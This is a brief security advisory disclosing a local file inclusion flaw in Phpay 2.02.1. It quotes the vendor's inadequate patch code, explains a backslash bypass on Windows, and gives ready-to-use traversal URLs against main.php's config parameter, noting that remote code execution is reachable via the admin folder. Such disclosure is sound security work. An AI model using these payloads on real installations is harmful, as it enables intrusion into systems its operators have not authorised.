By Michael Brooks
Vulnerability Type:Local File Inclusion
Software: Phpay
Homepage:http://sourceforge.net/projects/phpay/
Version Affected:2.02.1
Phpay has been affected by multiple local file include flaws, as a result this patch was written:
$config = ereg_replace(":","", $config);
$config = trim(ereg_replace("../","", $config));
$config = trim(ereg_replace("/","", $config));
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}
require("./$config");
To bypass this patch backslashes can be used instead of forward slashes on windows systems.
Also .inc.php must exists *somewhere* in the string.
Local File Include for windows only:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
or if magic_quotes_gpc is turned on:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess
Remote code execution is accessible in the ./admin/ folder.
The admin folder *should* be protected by a .htaccess file similar to osCommerce2.
Vulnerable configuration:
A there is a call to extract($_GET) so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue.
Merry Christmas